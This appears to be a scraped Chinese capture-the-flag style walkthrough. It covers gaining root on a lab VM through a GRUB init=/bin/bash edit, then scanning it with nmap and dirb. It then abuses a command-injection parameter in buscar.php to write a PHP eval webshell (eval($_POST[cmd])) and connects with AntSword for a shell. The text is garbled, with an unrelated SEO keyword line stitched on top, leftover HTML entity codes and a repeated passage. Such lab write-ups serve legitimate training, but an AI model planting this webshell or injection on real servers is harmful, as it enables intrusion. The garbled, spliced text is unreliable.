将网站加入小程序,采集网站怎么做,wordpress网站的搭建,网页怎么制作链接靶机 ip#xff1a;192.168.152.155
把靶机的网络模式调成和攻击机kali一样的网络模式#xff0c;我的kali是NAT模式,
在系统启动时(长按shift键)直到显示以下界面 ,我们选第二个#xff0c;按回车。 继续选择第二个#xff0c;这次按 e 进入编辑页面 接下来#xff0c;…靶机 ip192.168.152.155
把靶机的网络模式调成和攻击机kali一样的网络模式我的kali是NAT模式,
在系统启动时(长按shift键)直到显示以下界面 ,我们选第二个按回车。 继续选择第二个这次按 e 进入编辑页面 接下来 删除recovery nomodeset并在末尾添加quiet splash rw init/bin/bash 按 F10 或者 ctrlx 启动 我们 cd 到 etc 下的 network 目录中修改 interfaces 文件将网卡信息设置为 ens33重启靶机即可生效。
cd etc
cd network
vim interfaces 我们使用 nmap -sS 扫描端口 发现他开启了 80 和 21 端口
我们访问一下 80 端口 发现了一个 site 目录点击进去是一个页面 我们继续使用 dirb 查一下他有什么文件 我们挨个访问一下assets 是一个图片目录
css 是一个文件目录 访问到 buscar.php 中发现url 框中有参数 buscar
我们输入一个 id 参数 页面有变化
这时我们就可以写入一个一句话木马
echo ?php eval($_POST[cmd]); 123.php 我们去访问一下 123.php 访问成功使用蚁剑连接 获得 shell
